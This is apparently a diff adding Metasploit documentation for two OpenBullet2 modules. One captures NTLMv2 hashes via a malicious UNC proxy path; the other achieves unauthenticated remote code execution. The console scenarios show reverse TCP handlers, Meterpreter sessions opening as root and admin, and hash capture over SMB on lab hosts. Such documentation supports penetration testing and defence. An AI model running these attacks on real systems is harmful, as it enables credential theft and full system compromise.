Add OpenBullet2 modules (CVE-2026-25856 and CVE-2026-39908)

documentation/modules/auxiliary/scanner/http/openbullet2_unauth_hash_disclosure_cve_2026_39908.md

@@ -0,0 +1,53 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Credential Disclosure vulnerability in OpenBullet2 on Windows.
+
+An attacker can force the application to disclose the NTLMv2 hash of the process user by configuring a job proxy source with a malicious UNC path. When the job starts, the application attempts to load proxies from the specified path via SMB, allowing the hash to be captured for offline cracking or relaying.
+
+The affected versions include releases from 0.2.5.
+
+## Setup
+
+### Windows
+
+1. Download [OpenBullet2.Web-win-x64.zip](https://github.com/openbullet/OpenBullet2/releases/download/0.3.3.3093/OpenBullet2.Web-win-x64.zip) and unpack
+2. Run
+```
+.\OpenBullet2.Web.exe --urls "http://0.0.0.0:5000"
+```
+
+### Set Authentication
+
+Authentication is turned off by default.
+You need to set it to check bypass.
+
+1. Go to http://127.0.0.1:8069/settings
+2. Click "Change admin password" and set any password
+3. Turn "Require admin login" on
+4. Save
+
+## Scenario
+
+```
+msf > use scanner/http/openbullet2_unauth_hash_disclosure_cve_2026_39908
+msf auxiliary(scanner/http/openbullet2_unauth_hash_disclosure_cve_2026_39908) > set SRVHOST eth0
+SRVHOST => 192.168.19.153
+msf auxiliary(scanner/http/openbullet2_unauth_hash_disclosure_cve_2026_39908) > set RHOST 192.168.19.154
+RHOST => 192.168.19.154
+msf auxiliary(scanner/http/openbullet2_unauth_hash_disclosure_cve_2026_39908) > set RPORT 5000
+RPORT => 5000
+msf auxiliary(scanner/http/openbullet2_unauth_hash_disclosure_cve_2026_39908) > run
+[*] Running module against 192.168.19.154
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] OpenBullet2 Instance OS: Microsoft Windows NT 10.0.19044.0
+[+] The target appears to be vulnerable. Detected version 0.3.3.3093, which is vulnerable
+[*] Server is running. Listening on 192.168.19.153:445
+[*] The SMB service has been started.
+[*] Listening for hashes on 192.168.19.153:445
+[SMB] NTLMv2-SSP Client     : 192.168.19.154
+[SMB] NTLMv2-SSP Username   : DESKTOP-1E5TEED\admin
+[SMB] NTLMv2-SSP Hash       : admin::DESKTOP-1E5TEED:[HASH]
+
+[*] Server stopped.
+[*] Auxiliary module execution completed
+```

documentation/modules/exploit/multi/http/openbullet2_unauth_rce_cve_2026_25856.md

@@ -0,0 +1,100 @@
+## Vulnerable Application
+
+This Metasploit module exploits an Unauthenticated Remote Code Execution (RCE) vulnerability in OpenBullet2.
+
+Attackers can leverage the plain C# execution mode, which lacks reference filtering or API restrictions, to access the file system, spawn processes, and invoke arbitrary .NET APIs as the process user.
+
+The affected versions include releases from 0.2.5.
+
+## Setup
+
+### Linux
+
+1. Set up
+```
+docker run --name openbullet2 --rm -p 5000:5000 -it openbullet/openbullet2:0.3.2
+```
+
+### Windows
+
+1. Download [OpenBullet2.Web-win-x64.zip](https://github.com/openbullet/OpenBullet2/releases/download/0.3.3.3093/OpenBullet2.Web-win-x64.zip) and unpack
+2. Run
+```
+.\OpenBullet2.Web.exe --urls "http://0.0.0.0:5000"
+```
+
+### Set Authentication
+
+Authentication is turned off by default.
+You need to set it to check bypass.
+
+1. Go to http://127.0.0.1:8069/settings
+2. Click "Change admin password" and set any password
+3. Turn "Require admin login" on
+4. Save
+
+## Scenario
+
+### Linux
+
+```
+msf > use exploit/multi/http/openbullet2_unauth_rce_cve_2026_25856
+[*] Using configured payload
+msf exploit(multi/http/openbullet2_unauth_rce_cve_2026_25856) > set target 1
+target => 1
+msf exploit(multi/http/openbullet2_unauth_rce_cve_2026_25856) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf exploit(multi/http/openbullet2_unauth_rce_cve_2026_25856) > set RPORT 8069
+RPORT => 8069
+msf exploit(multi/http/openbullet2_unauth_rce_cve_2026_25856) > set LHOST docker0
+LHOST => 172.17.0.1
+msf exploit(multi/http/openbullet2_unauth_rce_cve_2026_25856) > run
+[*] Started reverse TCP handler on 172.17.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] OS: Debian GNU/Linux 12 (bookworm)
+[+] The target appears to be vulnerable. Detected version 0.3.2, which is vulnerable
+[*] Sending stage (3090404 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:40666) at 2026-06-06 06:38:56 -0400
+
+meterpreter > sysinfo
+Computer     : 67393a3c15a2
+OS           : Debian 12.7 (Linux 6.18.12+kali-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+```
+
+### Windows
+
+```
+msf > use exploit/multi/http/openbullet2_unauth_rce_cve_2026_25856
+[*] Using configured payload 
+msf exploit(multi/http/openbullet2_unauth_rce_cve_2026_25856) > set RHOSTS 192.168.19.154
+RHOSTS => 192.168.19.154
+msf exploit(multi/http/openbullet2_unauth_rce_cve_2026_25856) > set RPORT 5000
+RPORT => 5000
+msf exploit(multi/http/openbullet2_unauth_rce_cve_2026_25856) > set target 2
+target => 2
+msf exploit(multi/http/openbullet2_unauth_rce_cve_2026_25856) > set LHOST eth0
+LHOST => eth0
+msf exploit(multi/http/openbullet2_unauth_rce_cve_2026_25856) > run
+[*] Started reverse TCP handler on 192.168.19.153:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] OS: Microsoft Windows NT 10.0.19044.0
+[+] The target appears to be vulnerable. Detected version 0.3.3.3093, which is vulnerable
+[*] Sending stage (232006 bytes) to 192.168.19.154
+[*] Meterpreter session 1 opened (192.168.19.153:4444 -> 192.168.19.154:50388) at 2026-06-06 03:42:13 -0400
+
+meterpreter > sysinfo
+Computer        : DESKTOP-1E5TEED
+OS              : Windows 10 21H2 (10.0 Build 19044).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: DESKTOP-1E5TEED\admin
+```